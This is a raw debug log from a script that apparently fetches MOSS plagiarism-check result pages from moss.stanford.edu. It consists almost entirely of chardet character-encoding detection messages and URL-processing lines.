http://moss.stanford.edu/results/374137986/match22-top.html\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match22-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match22-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match23-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match23-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match23-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match16-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match16-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match16-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 17966\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 
17953\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 17966\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 17953\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 22176\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 17953\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 17954\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 22163\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 17953\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 22176\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 22163\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 32821\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 22163\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 32808\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 22164\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 32821\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 22163\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 32808\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 32808\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 32809\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 32808\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5194405120835017\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 
0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match20-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match20-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match20-1.html\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5275032939294848\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5281419799938888\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match19-top.html\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match19-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match19-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match18-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match18-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match18-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25364\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25351\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19797\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25364\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19784\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25351\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19797\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25351\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19784\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25352\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19784\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match21-top.html\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19785\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25351\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19784\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 
0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5385101839887853\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5267551211286687\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.505\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-JP Japanese confidence = 0.01\nDEBUG:chardet.charsetprober:GB2312 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-KR Korean confidence = 0.01\nDEBUG:chardet.charsetprober:CP949 Korean confidence = 0.01\nDEBUG:chardet.charsetprober:Big5 Chinese confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW Taiwan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5567203672689943\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.01\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match21-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match21-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match17-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match17-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match17-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match24-top.html\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match24-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match24-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19759\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 25542\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 21998\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19746\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19759\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 25529\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19746\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 21985\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 25542\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19746\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 21998\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 25529\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19747\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 21985\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 25529\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19746\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 21985\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 25530\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 21986\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 25529\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 21985\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5280973138154603\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 
0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5290601551539237\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5254607172954946\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.7525\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:root:Processing URL: 
http://moss.stanford.edu/results/374137986/match28-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match28-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match28-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match25-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match25-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match25-1.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match27-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match27-0.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match27-1.html\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 19263\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 19250\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 19263\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 19250\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 19250\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 19251\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40775\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 36686\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 19250\nDEBUG:chardet.charsetprober:SHIFT_JIS Japanese prober hit error at byte 40775\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:windows-1251 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:KOI8-R Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:MacCyrillic Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM866 Russian confidence = 0.0\nDEBUG:chardet.charsetprober:IBM855 Russian confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-7 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1253 Greek confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-5 Bulgairan confidence = 0.01\nDEBUG:chardet.charsetprober:windows-1251 Bulgarian confidence = 0.01\nDEBUG:chardet.charsetprober:TIS-620 Thai confidence = 0.01\nDEBUG:chardet.charsetprober:ISO-8859-9 Turkish confidence = 0.5433467222841619\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 36673\nDEBUG:chardet.charsetprober:windows-1255 Hebrew confidence = 0.0\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40762\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 36686\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40775\nDEBUG:chardet.charsetprober:Big5 not 
active\nDEBUG:chardet.charsetprober:EUC-JP Japanese prober hit error at byte 40762\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 36673\nDEBUG:chardet.charsetprober:EUC-TW not active\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40762\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match30-top.html\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match30-0.html\nDEBUG:chardet.charsetprober:GB2312 Chinese prober hit error at byte 40775\nDEBUG:root:Processing URL: http://moss.stanford.edu/results/374137986/match30-1.html\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 36673\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40762\nDEBUG:chardet.charsetprober:EUC-KR Korean prober hit error at byte 40762\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40763\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 36674\nDEBUG:chardet.charsetprober:CP949 Korean prober hit error at byte 40762\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 40762\nDEBUG:chardet.charsetprober:EUC-TW Taiwan prober hit error at byte 36673\nDEBUG:chardet.charsetprober:Big5 Chinese prober hit error at byte 40763\nDEBUG:chardet.charsetprober:utf-8 confidence = 0.938125\nDEBUG:chardet.charsetprober:SHIFT_JIS not active\nDEBUG:chardet.charsetprober:EUC-JP not active\nDEBUG:chardet.charsetprober:GB2312 not active\nDEBUG:chardet.charsetprober:EUC-KR not active\nDEBUG:chardet.charsetprober:CP949 not active\nDEBUG:chardet.charsetprober:Big5 not active\nDEBUG:chardet.charsetprober:EUC-TW 